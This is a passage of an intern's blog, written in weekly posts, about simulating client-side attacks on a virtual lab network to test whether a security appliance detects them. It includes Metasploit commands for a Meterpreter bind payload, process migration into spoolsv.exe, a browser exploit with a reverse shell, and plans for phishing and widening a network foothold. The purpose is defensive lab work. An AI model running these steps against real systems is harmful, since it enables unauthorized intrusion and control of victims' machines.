I then fired up msfconsole. The following commands got me ready to run and connected to the victim:

set PAYLOAD windows/meterpreter/bind_tcp
show options
set RHOST 192.168.2.50
exploit

I was then in a Meterpreter session. By typing help or ? you can see what commands are available to you. I did a ps to see what processes were running on VictimXP.

and decided that since spoolsv.exe (PID 1880) was running as system, I would migrate there. I did this by typing migrate 1880. Meterpreter responded that migration was successful. Here you can see that the msf_met.bind.tcp.exe process has disappeared.

Curiously, netstat still showed the connection as established, but listed the the owning PID as 1240. This was the PID of msf_met.bind.tcp.exe. Attempting taskkill /PID 1240 resulted in an error.

If we use Process Explorer to look at spoolsv.exe it doesn't show any open connections.

It would seem that we can see something is established, but we can't stop it. Thank God for TCPView.

Here we see PID 1240 as non-existent, but TCPView allows us to close the connection with a right click. After closing the connection with TCPView, I moved back over the the Meterpreter session. There was no warning of a disconnect, but when I issued a help command I was notified that the session had closed.

It is possible to notice something is strange on the victim machine by using Process Explorer, but the following methods would assume you knew a baseline memory size/handle count for every running process. We can see the changes by comparing the memory sizes of the spoolsv.exe process before...

and after...

...the migration of the Meterpreter session. The virtual memory, physical memory, and handle counts have all changed.

See what I mean about scary?

This has been a very interesting week, and I really look forward to working with the Metasploit Framework a lot more.

SimWitty Internship: Week 3

2010-01-31T21:43:00.002-06:00

This week I experimented with some of the tools I am considering using for the lab. These consisted of:

Inguma
Fast-Track
Metasploit Framework 3

Inguma is interesting but I won't be using it. The GUI version is just plain broken, and the console version seems buggy. It will nicely autoscan a system, but the most useful information you get back is the netbios name table.

Fast-Track has a lot of potential but the documentation is very slim. There are many references to a wiki and other things at thepentest.com but the site seems to be dying or dead. Fast-Track used to be backed by SecureState.com but I'm not even sure that Dave Kennedy (the author) even works there anymore. There is no information on Fast-Track to be found at the SecureState site anymore. I will still continue to investigate this tool, just because it seems like it could be very useful.

This leaves us with the tool of choice: Metasploit Framework 3. Metasploit is very broad in scope, and covers just about any area a pen-tester could need. Its abilities range from the 'autopwn' tool to creating custom exploit modules.
I was able to successfully attack a test vm running Windows XP SP3. The exploit I used was exploit/windows/browser/ie_createobject. It was a good example for this lab, because it basically creates a malicious webserver that listens for connections. I connected to it from the vm using IE 6, and got exploited with no real visible clue. The page contained some random text but I'm sure this could be adjusted. I just chose a simple reverse tcp shell for the payload, and it connected back just fine. I was able to execute commands on the victim.

Since it is obvious that Metasploit is going to be the most useful, I intend on doing much more practice with it. I need to concentrate on figuring a way to get a toolkit uploaded to the exploited computer. This way I can work on scanning the network from the inside and increasing my foothold with tools like Ettercap.

One small note, Matriux doesn't come with a pdf viewer as far as I could tell. Both the Metasploit user manual and developer manual are pdf files. You can install a pdf viewer by typing sudo apt-get update, and then sudo apt-get install epdfview.

SimWitty Internship: Week 2

2010-01-24T20:02:00.000-06:00

The task this week was to choose which tools from the Matriux arsenal are most appropriate to use for this project. Restating the goal of the project will probably aid in clarity. The objective is to simulate client side type attacks through penetration testing and determine how the SimWitty appliance handles this traffic/behavior. With this in mind, the main tasks with this project should be:

Crafting email messages that link to a malicious website.
Creating the proper exploits for this website to affect workstations running Windows XP professional.
Gain control of those workstations if possible.
Attempt to increase the foothold within the network.

With this being the goal, certain tools are ruled out immediately. I won’t be needing any tools in the Wireless class or the Bluetooth class. On the other hand, certain tools will be absolutely necessary. These are mainly the tools in the Framework class. For all the other basic classes it is more hit and miss, some will be useful and some will not. I made an Microsoft Access database that includes: the tool name, a description of the tool, whether it is necessary to the project, and a link to the tools website. I then created a report from the database, and printed the report out to pdf format (available here).

I am fairly certain that the main tool I will be using is the Metasploit Framework. MSF is a very nicely packaged system that should allow me to accomplish the project goals. In looking at the Fast-Track toolset, it also has possibilities. It is (at first glance) a scripted and simplified way of interacting with MSF, but I also believe it brings some of its own functionality to the table. Other tools that will probably be useful are those whose purpose is to explore a LAN and consolidate a foothold there. An example of this class is Ettercap. It goes without saying that Wireshark and Nmap will be needed.

There are many tools in Matriux that would be useful in a real world situation that I won’t be using in this project. This is no reflection on the tool or the Matriux arsenal, this is just a specialized case. An example of this is the Reconnaissance class. In the real world, it would be necessary to discover a lot more about the target company. For client side attacks such as spear-phishing to work, the attacker must be as familiar as possible with the target.

SimWitty Internship: Week 1

2010-01-17T15:39:00.002-06:00

Overview

In the world of information security, threats are constantly changing and attack vectors are always moving. Security is tightened on servers, networks are more closely monitored, so attackers look for other ways to infiltrate the network. This is evidenced by the recent attack on Google (and other companies). The intrusion was accomplished by targeting specific users and compromising their workstation using a web browser 0day. The breach was most likely initiated through links sent in IM or email. As security on servers and networks is locked down, it becomes more apparent what a weak spot the workstation can be. The workstation is often a far more complex environment than a server, at least as far as getting it locked down. This is the place where the employee must work... must have certain software installed to do their job. There are often many third party components installed on the workstation, and patch management on third party components is not generally given much attention.

In order for SimWitty to be an effective security appliance, it must be able to detect and alert on this type of workstation based behavior. One way to test this ability is through penetration testing. The penetration test must be able to simulate this type of client side based attack. This will be the main goal of my internship with the SimWitty project: to simulate client side type attacks through penetration testing and determine how the SimWitty appliance handles this traffic/behavior.

Problem

Prevention is hard. There will always be new vulnerabilities discovered, and thus 0day attacks generated. For this reason, a solution that relies solely on trying to prevent attack and intrusion is likely doomed to fail.
Detection is the next best thing. Since prevention of every type of attack is impractical, it is vital to be able to at least detect when an attack has succeeded. Only by knowing a breach has occurred can it be stopped.

Solution

Prevent what you can and detect everything else. Preventing known attacks through patch management and signature based detection is the start of any good security program. The trickier question is how to detect 0day attacks on your assets.
Use pen testing to verify detection. Through the proper setup and execution of a pen testing exercise, detection can be verified.
Analyze, Adjust, and Re-Test. Only through various tests and adjustments can detection be perfected within a system.

Plan

In order for a pen testing exercise to be successful, it must be planned beforehand and documented afterwards. The SimWitty project has decided to use the Matriux security distribution for it’s security testing suite, so the plan will start with Matriux.

Explore the Matriux Arsenal. The Matriux distribution will have in the neighborhood of 300 different tools/utilities/libraries. With this much to choose from, it becomes essential to decide which tools will be useful to the test.
Explore VirtualBox and it’s networking capabilities. My testing will be against a virtual network that simulates a small business. My virtualization software of choice is VirtualBox. One advantage of the VirtualBox platform is the ability of its simulated network interfaces to operate in promiscuous mode. To analyze the test results, the operator must understand and be familiar with how the test platform works.
Build an example network. For the testing to be relevant, it must operate against a target that resembles reality as closely as possible. I will attempt to create a representation of a small business network using virtual machines consisting of a Windows 2008 Server, a couple of Windows XP workstations, and either a SimWitty appliance or a Snort server.
Execute an attack simulation. Having decided on which tools from Matriux will be most useful, I will attempt an attack against my virtual network. The goal will be to simulate some sort of a client side attack that an employee at a small business might face, such as email phishing for login credentials, a malicious file attachment, or phishing with redirection to a malicious website.
Document how the attack is detected and reported on. I will observe the behavior of SimWitty/Snort device to see whether the attack is detected, and how the device alerts about the attack. I may also employ another machine that will sit on the network and record all traffic passively. This could allow me to create pcap files that would be useful to those developing the detection and reporting engines of SimWitty.
Document the process and results. As I am working on the internship, I intend to keep copious notes throughout the process. After I am done, I will use these notes to do a write-up of the entire process. This should prove helpful to any interns that may follow by allowing them to recreate beginning steps, then proceed to deeper research topics.

Summary

I look forward to the SimWitty internship being not only a great challenge, but a great learning opportunity. It will test (and build) my ability to plan, my ability to think through problems, my ability to adapt and adjust, and my ability to document and communicate with others. I believe that this work should give me a firm understanding of the basics of penetration testing, and a glimpse into the kind of real world problems that an information security professional must be able to react to and deal with.